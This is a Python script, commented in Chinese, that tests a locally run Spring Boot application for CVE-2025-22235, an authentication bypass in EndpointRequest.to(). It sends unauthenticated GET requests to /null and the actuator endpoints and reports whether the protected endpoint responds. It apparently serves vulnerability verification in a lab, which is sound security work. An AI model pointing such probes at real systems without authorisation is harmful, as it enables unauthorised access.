#!/usr/bin/env python3
"""
CVE-2025-22235 漏洞测试脚本
用于验证Spring Boot EndpointRequest.to()认证绕过漏洞
"""

import requests
import sys
import time

def test_vulnerability():
    """测试CVE-2025-22235漏洞"""
    base_url = "http://localhost:8080"
    
    print("=" * 60)
    print("CVE-2025-22235 漏洞测试")
    print("=" * 60)
    
    # 测试1: 访问受保护的/null端点（应该被绕过）
    print("\n[测试1] 访问受保护的 /null 端点...")
    try:
        response = requests.get(f"{base_url}/null", timeout=10)
        if response.status_code == 200:
            print("❌ 漏洞存在！未登录即可访问受保护的端点")
            print(f"   响应内容: {response.text}")
            print("   这证明了CVE-2025-22235认证绕过漏洞")
        else:
            print(f"✅ 端点受保护，状态码: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
        return False
    
    # 测试2: 访问其他受保护的端点（应该要求认证）
    print("\n[测试2] 访问其他受保护的端点...")
    try:
        response = requests.get(f"{base_url}/info", timeout=10)
        if response.status_code == 401 or response.status_code == 302:
            print("✅ 端点正常受保护，要求认证")
        else:
            print(f"⚠️  端点状态异常，状态码: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
    
    # 测试3: 访问健康检查端点
    print("\n[测试3] 访问健康检查端点...")
    try:
        response = requests.get(f"{base_url}/actuator/health", timeout=10)
        if response.status_code == 404:
            print("✅ health端点未暴露（符合漏洞触发条件）")
        else:
            print(f"⚠️  health端点状态: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
    
    # 测试4: 访问info端点
    print("\n[测试4] 访问info端点...")
    try:
        response = requests.get(f"{base_url}/actuator/info", timeout=10)
        if response.status_code == 200:
            print("✅ info端点正常暴露")
        else:
            print(f"⚠️  info端点状态: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"❌ 请求失败: {e}")
    
    print("\n" + "=" * 60)
    print("测试完成")
    print("=" * 60)
    
    return True

def check_server_status():
    """检查服务器是否运行"""
    try:
        response = requests.get("http://localhost:8080", timeout=5)
        return True
    except:
        return False

if __name__ == "__main__":
    print("CVE-2025-22235 漏洞测试脚本")
    print("请确保Spring Boot应用已启动在 http://localhost:8080")
    
    # 检查服务器状态
    if not check_server_status():
        print("❌ 服务器未运行，请先启动Spring Boot应用")
        print("   使用命令: mvn spring-boot:run")
        sys.exit(1)
    
    # 执行测试
    test_vulnerability()




